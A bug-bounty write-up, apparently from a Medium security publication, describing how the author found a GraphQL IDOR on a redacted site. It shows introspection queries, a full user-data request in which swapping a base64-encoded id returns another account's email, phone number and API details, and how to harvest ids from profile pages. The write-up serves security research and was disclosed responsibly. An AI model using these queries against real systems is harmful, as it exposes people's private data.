GraphQL IDOR leads to information disclosure

Eshan Singh
Dec 24, 2019 · 3 min read
Image for post
Image for post

Hello World!, I’m Eshan Singh aka R0X4R. I’m here to share my recent findings on GraphQL IDOR (Insecure Direct Object Reference), which leads to information disclosure. So, let’s start. I’m signing in…

What is GraphQL?

The GraphQL Foundation defines “GraphQL is an open-source data query and manipulation language for APIs, and a runtime for fulfilling queries with existing data.” Nowadays, GraphQL is being used in place of Rest-API’s.

Vulnerability

While doing recon for redacted.com (A private program and as per their privacy policies, I cannot disclose their name), I found that the web app is using GraphQL for their API Management.

So, I firstly tried Introspection Query to extract sensitive information. After passing the query I saw a field called Users, so I pass

Query: {__type (name: \”Users\”) {name fields{name type{name kind ofType{name kind}}}}}”}

the query to enumerate the Types` definition in field “Users”, then I saw _type “Users” contains some fields i.e., Email, mobile_number, user_id, location, and api_key. So, I pass one more query to extract information those fields carried but I got 403 Unauthorised response.

Query: {Users{email,mobile_number,user_id,api_key}}
Image for post
Image for post
Source: https://imgflip.com/memetemplate/100827024/Sad-meme

So, I thought that this web app is not vulnerable, so I started hunting for XSS. I clicked on My Profile, then I edited my name and intercepted the request, then I saw something interesting; the web app extracts previous info of the user before requesting a new edit.

Request: {“operationName”:”CurrentUserData”,”variables”:{“id”:” — base64 encode — “},”query”:”query CurrentUserData($id: ID!) {\n User(id: $id) {\n id\n email\n name\n mobile_number\n apiHostUrl\n SiteAdminUrl\n pages(first: 50) {\n nodes {\n id\n faviconUrl\n name\n code\n manageUrl\n __typename\n }\n __typename\n }\n __typename\n }\n}\n”}

So, I sent that request to the repeater and in that request, there is a variable called “id”, which contains something in base64. So, I decode that base64 encoded string

Decode: oph:cloud:redacted::user/p5yhwx30First Account: r0x4r@hhacker.comSecond Account: bcr_rox4r@hacker.com

“P5yhwx30” is my “id.” So, I created one more account on redacted.com and copied its “id: oph:cloud:redacted::user/d5mzk1m2”.

Image for post
Image for post
Source: https://winkgo.com/wp-content/uploads/2019/03/happy-memes-make-you-smile-more-02.jpg?ezimgfmt=ng:webp/ngcb3

Then I logged out from my second account and logged in with my first account. Now I pass the same query, but I changed my “id” with my second “id” and boom! I got the information.

Image for post
Image for post
Image for post
Image for post
Source: https://me.me/i/oh-yeah-meme-creator-funny-oh-yeah-meme-generator-b8bd2dcfd4db44bb961bcd638a4b2659

But there’s a problem waiting for me that how I get another user “id.” So, after enumerating, I found that the “id” of the other users is in their profile page source code. I just have to go to their profile and view the source of their profile page, then I searched for “var_userID,” and I got their “id.”

Image for post
Image for post
source: https://media1.tenor.com/images/17d912fad3b04c322b0c2678adeccf97/tenor.gif?itemid=10323706

Disclosure:

Reported to redacted.com on 15 Nov 2019

They rewarded me with 3 Digits bounty on 07 Dec 2019.

Thanks and regards!

Eshan Singh [R0X4R]

Signing out…

Sign up for Infosec Writeups

By InfoSec Write-ups

Newsletter from Infosec Writeups Take a look

By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices.

Check your inbox
Medium sent you an email at to complete your subscription.

Eshan Singh

Written by

Hi.. I’m that hacker teenager that your friends told you about. I hack to make system secure. Hacker — Developer — Influencer — Graphics Designer

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Eshan Singh

Written by

Hi.. I’m that hacker teenager that your friends told you about. I hack to make system secure. Hacker — Developer — Influencer — Graphics Designer

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store